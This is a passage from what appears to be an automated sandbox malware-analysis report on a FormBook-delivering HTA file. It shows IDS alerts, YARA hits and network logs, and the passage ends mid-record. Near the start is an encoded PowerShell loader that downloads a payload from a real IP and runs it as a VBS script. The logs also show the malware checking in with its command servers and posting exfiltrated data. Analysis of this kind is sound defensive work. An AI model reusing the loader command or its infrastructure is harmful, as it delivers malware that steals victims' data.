VSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNJTnQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUGV6TWJGd0JaZiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpGY3FXayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDM4TDVlalpXSUdyOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMjQ0L25pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm5ldy50aUZGIiwiJGVuVjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIiwwLDApO3NUQXJ0LXNMZWVwKDMpO0lJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIg=='+[cHAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6772, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.cmdline", ProcessId: 6884, ProcessName: csc.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-04T13:08:11.192706+010020576351A Network Trojan was detected107.172.44.17580192.168.2.849709TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-04T13:08:31.061460+010020490381A Network Trojan was detected151.101.129.137443192.168.2.849705TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-04T13:09:38.120623+010028554651A Network Trojan was detected192.168.2.849723172.67.150.21180TCP
                      2024-12-04T13:10:02.988867+010028554651A Network Trojan was detected192.168.2.849783172.67.128.10980TCP
                      2024-12-04T13:10:18.203664+010028554651A Network Trojan was detected192.168.2.849822199.59.243.22780TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-04T13:09:54.892305+010028554641A Network Trojan was detected192.168.2.849764172.67.128.10980TCP
                      2024-12-04T13:09:57.553460+010028554641A Network Trojan was detected192.168.2.849771172.67.128.10980TCP
                      2024-12-04T13:10:00.253464+010028554641A Network Trojan was detected192.168.2.849777172.67.128.10980TCP
                      2024-12-04T13:10:10.198968+010028554641A Network Trojan was detected192.168.2.849800199.59.243.22780TCP
                      2024-12-04T13:10:12.872968+010028554641A Network Trojan was detected192.168.2.849810199.59.243.22780TCP
                      2024-12-04T13:10:15.529013+010028554641A Network Trojan was detected192.168.2.849816199.59.243.22780TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-04T13:08:11.192706+010028582951A Network Trojan was detected107.172.44.17580192.168.2.849709TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus detection for URL or domain
                      Source: http://107.172.44.175/244/RFGDF.txtAvira URL Cloud: Label: malware
                      Multi AV Scanner detection for submitted file
                      Source: bestimylover.htaReversingLabs: Detection: 18%
                      Yara detected FormBook
                      Source: Yara matchFile source: 12.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000010.00000002.2658176307.0000000004BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2122879253.00000000015E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2105673675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2658252130.0000000004C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2138725831.00000000025A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2658015654.00000000035E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

                      Phishing

                      barindex
                      Yara detected HtmlPhish44
                      Source: Yara matchFile source: bestimylover.hta, type: SAMPLE
                      Source: unknownHTTPS traffic detected: 151.101.129.137:443 -> 192.168.2.8:49705 version: TLS 1.2
                      Source: Binary string: msinfo32.pdb source: HDLzkMKGEKBh.exe, 0000000F.00000003.2039275924.0000000000D84000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.1784118376.0000000007490000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1786164092.00000000079BA000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HDLzkMKGEKBh.exe, 0000000F.00000000.2024666715.000000000077E000.00000002.00000001.01000000.0000000C.sdmp, HDLzkMKGEKBh.exe, 00000011.00000000.2184131262.000000000077E000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 00000010.00000003.2105655055.0000000004AB8000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 00000010.00000003.2117925702.0000000004C67000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokenex`2dnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncount
                      Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, msinfo32.exe, 00000010.00000003.2105655055.0000000004AB8000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 00000010.00000003.2117925702.0000000004C67000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: aspnet_compiler.pdb source: msinfo32.exe, 00000010.00000002.2659047347.000000000543C000.00000004.10000000.00040000.00000000.sdmp, msinfo32.exe, 00000010.00000002.2656376865.0000000003010000.00000004.00000020.00020000.00000000.sdmp, HDLzkMKGEKBh.exe, 00000011.00000000.2184403066.000000000282C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.2412286934.00000000094AC000.00000004.80000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.1784118376.0000000007490000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1786164092.00000000079BA000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.1786164092.00000000079BA000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: msinfo32.pdbGCTL source: HDLzkMKGEKBh.exe, 0000000F.00000003.2039275924.0000000000D84000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: q8C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.pdb source: powershell.exe, 00000003.00000002.1544480434.0000000005148000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_02EBCAB0 FindFirstFileW,FindNextFileW,FindClose,16_2_02EBCAB0

                      Software Vulnerabilities

                      barindex
                      Suspicious execution chain found
                      Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 4x nop then xor eax, eax16_2_02EA9E90
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 4x nop then mov ebx, 00000004h16_2_04D104F8

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49723 -> 172.67.150.211:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49771 -> 172.67.128.109:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49764 -> 172.67.128.109:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49777 -> 172.67.128.109:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49783 -> 172.67.128.109:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49800 -> 199.59.243.227:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49822 -> 199.59.243.227:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49810 -> 199.59.243.227:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49816 -> 199.59.243.227:80
                      Source: Network trafficSuricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 107.172.44.175:80 -> 192.168.2.8:49709
                      Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 107.172.44.175:80 -> 192.168.2.8:49709
                      Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 151.101.129.137:443 -> 192.168.2.8:49705
                      Source: global trafficHTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /244/RFGDF.txt HTTP/1.1Host: 107.172.44.175Connection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 151.101.129.137 151.101.129.137
                      Source: Joe Sandbox ViewIP Address: 107.172.44.175 107.172.44.175
                      Source: Joe Sandbox ViewIP Address: 199.59.243.227 199.59.243.227
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_032F7A18 URLDownloadToFileW,3_2_032F7A18
                      Source: global trafficHTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /244/nightridingisreallyniceforworkingskillentiretimefornew.tiFF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 107.172.44.175Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /244/RFGDF.txt HTTP/1.1Host: 107.172.44.175Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /r72u/?-DiH=2XvD5&CJE8V=GItYwatNh5Xk+Q2MTg9ApsiGHoFk1E90IzupkRdOfJqts8zyaMFRFG2wZpK3L9f87JrBtQZPR7+NA6TbtORZfIe2HAOWLNTCJkmVcfUZGPKfL9xE/oouBrRom1yDfEIfZg== HTTP/1.1Host: www.enoughmoney.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.174
                      Source: global trafficHTTP traffic detected: GET /wl1d/?CJE8V=XvUXHicd9bu/Gt5jzcf/yfRZ+nBfc8WBaOJ84C+StjmOhsjVLRYh1E2iBn46Z6pXP/d+KNfO4kCSPH2wqnfuXKL7xm74uEd7QDGj+trIsQHnhWbGvacQ1+C6F6CbLlCz6w==&-DiH=2XvD5 HTTP/1.1Host: www.cifasnc.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.174
                      Source: global trafficHTTP traffic detected: GET /9p84/?CJE8V=sVrHaezIocwvk586NbKL/ZmiafOvpGHuxCd8uk51gcnLQEXEQAeULabxZfXafDaZqd/22GpcW/h9erqwiYl6Kq4oLeU8CyaDpPEVNRKQpnjvGs8eQi8Qsuigmn/6Gj17jw==&-DiH=2XvD5 HTTP/1.1Host: www.sql.danceAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.174
                      Source: global trafficDNS traffic detected: DNS query: res.cloudinary.com
                      Source: global trafficDNS traffic detected: DNS query: www.enoughmoney.online
                      Source: global trafficDNS traffic detected: DNS query: www.cifasnc.info
                      Source: global trafficDNS traffic detected: DNS query: www.sql.dance
                      Source: unknownHTTP traffic detected: POST /wl1d/ HTTP/1.1Host: www.cifasnc.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brConnection: closeCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 206Origin: http://www.cifasnc.infoReferer: http://www.cifasnc.info/wl1d/User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.174Data Raw: 43 4a 45 38 56 3d 61 74 38 33 45 56 77 42 6b 73 48 46 50 34 38 4a 77 49 48 51 6d 4e 34 53 33 32 77 71 4c 38 69 33 62 65 68 2f 35 56 66 70 74 6d 2b 63 71 73 7a 55 41 53 52 51 38 51 57 50 55 30 6b 52 50 59 45 39 51 2f 68 2f 54 39 7a 69 7a 58 75 41 45 6e 6d 77 74 6c 44 4e 63 4e 62 4b 78 51 6a 70 70 45 6c 49 55 42 44 69 71 4e 6a 52 69 48 72 47 76 6c 66 51 35 36 78 6f 6b 2b 37 6b 47 35 6a 71 55 32 2f 4e 35 36 77 50 6b 43 4b 57 65 76 4b 5a 68 46 51 59 4f 69 59 66 6c 57 31 4b 72 69 39 31 74 33 37 54 72 6e 75 2f 39 7a 6c 4f 36 70 34 46 75 31 33 50 4d 49 32 63 4d 69 62 63 34 4e 42 65 44 64 71 6b 71 6d 4f 34 58 4c 4d 3d Data Ascii: CJE8V=at83EVwBksHFP48JwIHQmN4S32wqL8i3beh/5Vfptm+cqszUASRQ8QWPU0kRPYE9Q/h/T9zizXuAEnmwtlDNcNbKxQjppElIUBDiqNjRiHrGvlfQ56xok+7kG5jqU2/N56wPkCKWevKZhFQYOiYflW1Kri91t37Trnu/9zlO6p4Fu13PMI2cMibc4NBeDdqkqmO4XLM=
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 12:09:37 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=742%2BUAINZjpdBsEaKOwC38Krv1ju7ChPcM%2FbqPxqYltx0Pl2MPNqZnPUS7JTm13qVyagMZorfFpJXpP4Y3FzWAvTeSKPHrDtvjEBMTzzTYcmZQxxX6QhwSES2LGX30oY%2FR7SjZuNKL3B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ecbb049f9b38c7d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1978&min_rtt=1978&rtt_var=989&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=495&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 63 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 37 32 75 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: cb<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /r72u/ was not found on this server.</p></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 12:09:54 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-pingback: http://cifasnc.info/xmlrpc.phpexpires: Wed, 11 Jan 1984 05:00:00 GMTlast-modified: Wed, 04 Dec 2024 12:09:54 GMTcache-control: no-cache, must-revalidate, max-age=0pragma: no-cachevary: Accept-Encoding,User-Agentx-turbo-charged-by: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SDegcyNPwz2ldTWYw8mBg1LChIHHwPUCoxwu31J22yKj59akTIGXZzJAbUOEER41dCLBaPAsqHwN2YHAv3j7qqgMeNbYAfPO%2FChkf3QAMvsve9TtxSen7N0nbwyqrBbtNwRv"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ecbb0b4486ec342-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1526&min_rtt=1526&rtt_var=763&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=751&delivery_rate=0&cwnd=158&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 31 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 5f 6f dc 36 0c 7f ce 01 f9 0e ac 0a e4 5a 6c 3e 27 6d b7 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec c3 0f 92 fc f7 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5 4c e2 20 b4 48 38 13 b7 a0 Data Ascii: 51eW_o6Zl>'mKAgYR$.zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#L H8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 12:09:57 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-pingback: http://cifasnc.info/xmlrpc.phpexpires: Wed, 11 Jan 1984 05:00:00 GMTlast-modified: Wed, 04 Dec 2024 12:09:57 GMTcache-control: no-cache, must-revalidate, max-age=0pragma: no-cachevary: Accept-Encoding,User-Agentx-turbo-charged-by: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wswr4lfsK7wYm1A%2BeG5PG0E9oWtyUFDue%2FOaVZV3AbXUHy9KfC35pTCP2Vc3aaTmhSAmMg2d1zJaBNjjQnQgyPkuC8UitQtnSg%2B14Qj8Tcr5ChsVW8ycqFDwTmPnUcraw4KG"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ecbb0c4fc367c82-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: 